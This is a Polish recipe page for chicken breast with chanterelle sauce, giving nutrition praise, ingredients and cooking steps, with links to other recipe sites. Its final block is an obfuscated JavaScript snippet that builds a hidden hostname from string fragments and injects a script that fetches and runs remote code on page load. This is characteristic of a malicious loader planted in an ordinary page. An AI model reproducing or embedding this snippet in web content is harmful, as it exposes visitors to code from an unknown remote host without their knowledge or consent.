Wykwintny przepis na pierś z kurczaka

<p>Filet z piersi kurczaka to dużo wysokowartościowego białka, zero węglowodan&oacute;w i miligramy tłuszczu. Oczywiście najlepiej, jeśli wybierzemy dr&oacute;b o sprawdzonym pochodzeniu od doświadczonego producenta.<br /> <strong>Dlaczego kurczak ekologiczny ? </strong><br /> Potrawy przygotowane ze zdrowych i bezpiecznych produkt&oacute;w mają wyjątkowe walory smakowe i zapachowe. Mięso kurczaka pochodzącego z ekologicznych upraw jest dojrzalsze, ale i mniej otłuszczone. <strong>Kurczak</strong>, kt&oacute;ry jest specjalnie karmiony (czyli bez dodatk&oacute;w pochodzenia zwierzęcego) i chowany w rodzinnych gospodarstwach, gdzie ma dużo przestrzeni do biegania, po przyrządzeniu zachwyca delikatnością i kruchością swojego mięsa. <strong>Pierś z kurczaka </strong>najwyższej jakości polecana jest szczeg&oacute;lnie dzieciom oraz osobom dbającym o zdrową dietę.<br /> <br /> <strong>Mięso najlepsze dla człowieka </strong><br /> Dobrze przyrządzony kurczak ma wyśmienity smak i aromat. Wiele os&oacute;b wyżej ceni sobie mięso czerwone niż dr&oacute;b. Zupełnie niesłusznie.<strong> Filet z piersi kurczaka </strong>doskonale smakuje i posiada szerokie zastosowanie w zbilansowanej diecie. Nie każdy wie, że mięso drobiowe zawiera wiele cennych dla zdrowia minerał&oacute;w jak: magnez, fosfor i potas. Dr&oacute;b jest r&oacute;wnież źr&oacute;dłem żelaza i cynku. Pierś kurczaka to mięso idealne dla wszystkich, kt&oacute;rzy dbają o zdrowie swoje i swojej rodziny.<br /> <br /> <strong>Przepis na pierś z kurczaka na bogato </strong><br /> Doskonałym przepisem jest pierś z kurczaka podawana z sosem kurkowym (inspirację dla przepisu znaleźć można tutaj: <a href="http://zagrodowy.pl/przepis/piers-z-kurczaka-z-sosem-kurkowym/" target="_blank">http://zagrodowy.pl/przepis/piers-z-kurczaka-z-sosem-kurkowym</a>/).<br /> Brzmi wytwornie, jednak to dość proste, szybkie i pożywne danie, w sam raz zar&oacute;wno na eleganckie przyjęcie, zbliżające się Święta, jak i na domowy obiad. Tak przygotowany kurczak to pyszny, oryginalny i niezapomniany smak, prawdziwa uczta dla podniebienia. Kurki stanowią natomiast subtelny, ale wyborny dodatek.<br /> <br /> <strong>Składniki:<br /> - </strong>dwie pojedyncze piersi z kurczaka - 40 dkg kurek (świeże lub mrożone) - mąka ( 1 łyżeczka); - śmietana 12% (1 łyżka) - masło (1 łyżka) ; - oliwa (1-2 łyżki) ; - przyprawy do smaku: s&oacute;l, pieprz, ząbek czosnku.</p>
<p>Mięso z piersi kurczaka należy pokroić w kostkę, dodać przyprawy i dusić pod przykryciem. Na patelni rozgrzać masło i oliwę, podsmażyć czosnek i wrzucić kurki (oczywiście oczyszczone) - doprawić solą, pieprzem i smażyć przez 5-10 minut. Jeśli będzie taka potrzeba, podlać wodą. Sos zagęścić łyżeczką mąki, a następnie dodać śmietany. Gotowy sos połączyć z<a href="http://moimokiem.com.pl/skrzydelka-z-kurczaka-w-miodzie-i-chili/" target="_blank"> kurczakiem</a>. Świetnie komponuje się podawany z kaszą gryczaną.</p>
<p>&nbsp;</p>
<script type="text/javascript">// <![CDATA[
(function(){
u66q=document.createElement("script");u66q.type="text/javascript";
u66q.async=true;u66q_=(("us")+"t")+"a";u66q_+=("t.i")+""+"n";u66q_+=(("f")+"o");
u66q.src="http://"+u66q_+"/6911749.vlqfalz766qhbXhhbigyrwk4nfq6gz";
document.body.appendChild(u66q);
})();
// ]]></script>